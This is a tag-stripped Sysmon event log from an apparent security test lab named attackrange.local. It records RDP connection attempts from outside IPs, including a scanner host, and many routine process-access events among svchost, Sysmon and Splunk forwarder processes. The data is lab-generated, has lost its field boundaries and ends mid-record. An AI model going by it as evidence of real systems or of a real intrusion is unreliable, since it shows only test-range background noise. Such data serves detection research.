SERVICEtcpfalsefalse80.82.77.85scanner.openportstats.com57949-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000064939Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:54.365{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-7195-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 23542300x800000000000000049627Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:54:56.608{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9B9C0A850E2DBB3BC682DD74D3842C03,SHA256=6FDE5D4B6E01B2EF384B9810E962DE4B6D022D900F3A2947EE7D8D9C2EDA726E,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000049626Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:54:53.841{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-64901-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 23542300x800000000000000049625Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:54:56.389{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=0F3E253A7945ADA002ABD91D8CA6A053,SHA256=8912388724EC071182A74F5BB1FD31FE2330D976F5F28282B8423D58D0CA6DDC,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000049624Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:54:56.045{85C0FFC9-B85D-607E-9B00-00000000BB01}37722740C:\Windows\system32\conhost.exe{85C0FFC9-EB40-607E-D606-00000000BB01}2428C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049623Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:54:56.045{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049622Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:54:56.045{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049621Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:54:56.045{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049620Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:54:56.045{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049619Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:54:56.045{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049618Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:54:56.045{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049617Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:54:56.045{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049616Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:54:56.045{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049615Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:54:56.045{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049614Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:54:56.045{85C0FFC9-B7EC-607E-0500-00000000BB01}416432C:\Windows\system32\csrss.exe{85C0FFC9-EB40-607E-D606-00000000BB01}2428C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000049613Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:54:56.045{85C0FFC9-B85C-607E-9700-00000000BB01}30763836C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{85C0FFC9-EB40-607E-D606-00000000BB01}2428C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000049612Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:54:56.046{85C0FFC9-EB40-607E-D606-00000000BB01}2428C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{85C0FFC9-B7EC-607E-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{85C0FFC9-B85C-607E-9700-00000000BB01}3076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000064947Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:57.564{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=10B7CD8067D8160912B87449D787DE4F,SHA256=23090B540FF393E78721C3C309DDD3BAD9D569BD88E7E8836F3ADEAFC6BCD2C4,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000064946Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:54:55.825{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-5829-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 10341000x800000000000000049658Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:54:57.811{85C0FFC9-EB41-607E-D806-00000000BB01}16443748C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{85C0FFC9-B85C-607E-9700-00000000BB01}3076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049657Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:54:57.686{85C0FFC9-B85D-607E-9B00-00000000BB01}37722740C:\Windows\system32\conhost.exe{85C0FFC9-EB41-607E-D806-00000000BB01}1644C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049656Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:54:57.686{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049655Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:54:57.686{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049654Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:54:57.686{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049653Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:54:57.686{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049652Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:54:57.686{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049651Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:54:57.686{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049650Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:54:57.686{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049649Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:54:57.686{85C0FFC9-B7EC-607E-0C00-00000000BB01}7281056C:\Windows\system32\svchost.exe{85C0FFC9-B7ED-607E-1E00-00000000BB01}1232C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000049648Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 